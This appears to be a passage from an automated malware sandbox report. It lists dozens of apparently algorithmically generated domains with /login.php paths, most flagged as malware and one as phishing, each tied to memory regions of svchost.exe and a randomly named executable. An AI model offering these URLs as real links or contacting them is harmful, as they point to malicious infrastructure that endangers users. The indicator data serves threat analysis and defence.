                                                                                                                                                                                                          http://lyxygax.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qexyhuv.com/login.phpC:svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929571849.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951392830.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881921461.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942895681.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699419339.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1823613650.000000000CC14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vopykum.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyxyxox.com/login.phpsvchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qedykiv.com/login.phpsvchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618370430.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603383955.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603227948.00000000008F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puvymul.com/http://lyryled.com/http://lysyxux.com/0svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puzylol.com/login.phpsvchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635624725.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632427360.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632319218.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lymywaj.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581649743.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://purywoq.com/login.phpsvchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1707434591.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lysyfyj.com/login.phpsvchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564981200.000000000CC62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qekyqop.com/login.phpsvchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://volyquk.com/login.phpsvchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1624209052.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623902689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840908556.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://volyjif.com/login.phpsvchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puzyxip.com/login.phpsvchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669257529.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682351904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684842179.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qegyval.com/http://purytyg.com/http://purytyg.com/http://qegyval.com/http://vocyjic.com/http:svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://pumyxiv.com/login.phpsvchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gacynuz.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2695107852.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gahyvuh.com/login.phpsvchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638005.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880220703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://volycem.com/login.phpsvchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2074336490.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076390642.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079858298.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080554579.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079969618.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1917692103.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080157740.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076185402.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950331749.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1950940753.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2075366204.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951109934.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899366935.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1948330211.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyryled.com/svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://puzyduq.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lymysan.com/login.phpsvchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693275657.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475968169.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735230744.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 